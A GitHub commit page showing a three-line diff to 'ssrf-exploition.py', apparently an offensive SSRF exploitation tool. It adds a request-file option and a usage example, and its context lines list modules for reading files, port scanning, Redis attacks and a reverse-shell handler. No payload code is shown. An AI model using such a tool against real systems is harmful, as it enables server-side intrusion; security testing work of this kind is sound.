Skip to content

Commit 1e85146

Browse files
authored
Update ssrf-exploition.py
1 parent 5bacda6 commit 1e85146

File tree

1 file changed

+3
-0
lines changed

1 file changed

+3
-0
lines changed

ssrf-exploition.py

+3
Original file line numberDiff line numberDiff line change
@@ -30,13 +30,15 @@
3030
python3 ssrf-exploit.py -u https://example.com/ -m readfiles --rfile
3131
python3 ssrf-exploit.py -u https://example.com/ -m portscan --ssl --uagent "SSRFexploitAgent"
3232
python3 ssrf-exploit.py -u https://example.com/ -m redis --lhost=127.0.0.1 --lport=8080 -l 8080
33+
python3 ssrf-exploit.py -d data/request.txt -u https://example.com/ -m redis
3334
3435
'''
3536
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
3637
parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
3738
parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
3839
parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
3940
parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
41+
parser.add_argument("--data", "-d", action="store", dest="reqfile", help="SSRF Request File")
4042
parser.add_argument("--moudle", "-m", action="store", dest="moudles", help="SSRF Moudles to enable")
4143
parser.add_argument("--handler", "-l", action="store", dest="handler", help="Start an handler for a reverse shell" )
4244
parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
@@ -475,3 +477,4 @@ def main():
475477

476478
logging.addLevelName( logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
477479
logging.addLevelName( logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
480+

0 commit comments

Comments
 (0)